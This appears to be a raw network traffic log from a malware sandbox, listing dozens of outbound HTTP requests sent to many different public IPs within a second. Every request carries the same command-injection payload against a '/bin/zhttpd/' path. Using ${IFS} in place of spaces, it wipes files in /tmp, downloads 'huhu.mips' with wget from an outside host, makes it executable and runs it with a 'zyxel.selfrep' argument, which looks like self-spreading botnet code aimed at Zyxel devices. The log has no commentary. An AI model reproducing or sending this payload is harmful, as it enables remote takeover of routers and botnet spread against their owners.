                                      Jan 19, 2024 17:29:26.662204981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3086192.168.2.1434320119.183.121.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.662261963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3087192.168.2.1456194130.208.211.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.662290096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3088192.168.2.146009414.85.46.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.662322044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3089192.168.2.144349232.226.246.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.662372112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3090192.168.2.1446232176.163.182.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.662405014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3091192.168.2.1455482124.26.77.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.662436962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3092192.168.2.14519328.251.120.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.662476063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3093192.168.2.1460218217.221.6.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.662513018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3094192.168.2.143948293.254.239.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.662543058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3095192.168.2.144152854.218.110.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.662595034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3096192.168.2.144260073.220.144.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.662616014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3097192.168.2.1444992170.96.102.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.662674904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3098192.168.2.144002291.135.187.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.662723064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3099192.168.2.1445264118.70.141.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.662744045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3100192.168.2.145484085.18.19.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.662786961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3101192.168.2.1441354222.172.202.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.662851095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3102192.168.2.145566038.80.138.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.662862062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3103192.168.2.1440520175.3.59.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.662897110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3104192.168.2.1457048160.101.252.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.662956953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3105192.168.2.1448076198.35.113.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.662981987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3106192.168.2.1439086165.125.75.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.663033962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3107192.168.2.144671873.72.11.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.663089991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3108192.168.2.143685699.80.177.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.663119078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3109192.168.2.145280661.2.111.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.663166046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3110192.168.2.144573688.239.99.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.663173914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3111192.168.2.14421849.203.157.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.663227081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3112192.168.2.143779674.213.32.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.663275957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3113192.168.2.1438956165.53.169.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.663316011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3114192.168.2.145956451.246.2.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.663356066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3115192.168.2.1450942210.106.119.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.663392067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3116192.168.2.1434566181.154.228.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.663435936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3117192.168.2.1438150101.151.81.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.663481951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3118192.168.2.14553805.21.88.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.663536072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3119192.168.2.1450246111.57.232.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.663561106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3120192.168.2.145968890.253.165.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.663611889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3121192.168.2.1434250161.242.235.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.663645983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3122192.168.2.1450612145.235.181.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.663667917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3123192.168.2.144256666.244.1.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.663741112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3124192.168.2.1441882192.161.22.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.663772106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3125192.168.2.145933487.150.11.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.663805008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3126192.168.2.1457110113.207.151.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.663847923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3127192.168.2.143731658.92.108.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.663881063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3128192.168.2.1454496122.151.74.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.663923025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3129192.168.2.1433802109.196.197.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.663944960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3130192.168.2.1437240121.95.168.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.664004087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3131192.168.2.1442786105.133.209.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.664041996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3132192.168.2.144139436.104.113.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.664076090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3133192.168.2.146052244.190.191.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.664123058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3134192.168.2.1439688132.11.69.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.664144993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3135192.168.2.143467643.175.160.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.664175034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3136192.168.2.143566086.12.192.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.664232969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3137192.168.2.1451694115.195.50.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.664253950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3138192.168.2.1454824124.155.33.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.664302111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3139192.168.2.1437380131.171.119.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.664356947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3140192.168.2.1456024152.16.16.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.664391994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3141192.168.2.145364274.179.25.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.664446115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3142192.168.2.1438738173.75.202.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.664479971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3143192.168.2.1438540114.18.114.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.664518118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3144192.168.2.145721882.188.201.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.664551020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3145192.168.2.1454866142.12.204.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.664609909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3146192.168.2.1457090220.79.71.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.664645910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3147192.168.2.145992470.247.52.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.664676905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3148192.168.2.14329488.221.18.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.664730072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3149192.168.2.1450762161.231.0.100443
                                      TimestampBytes transferredDirectionData
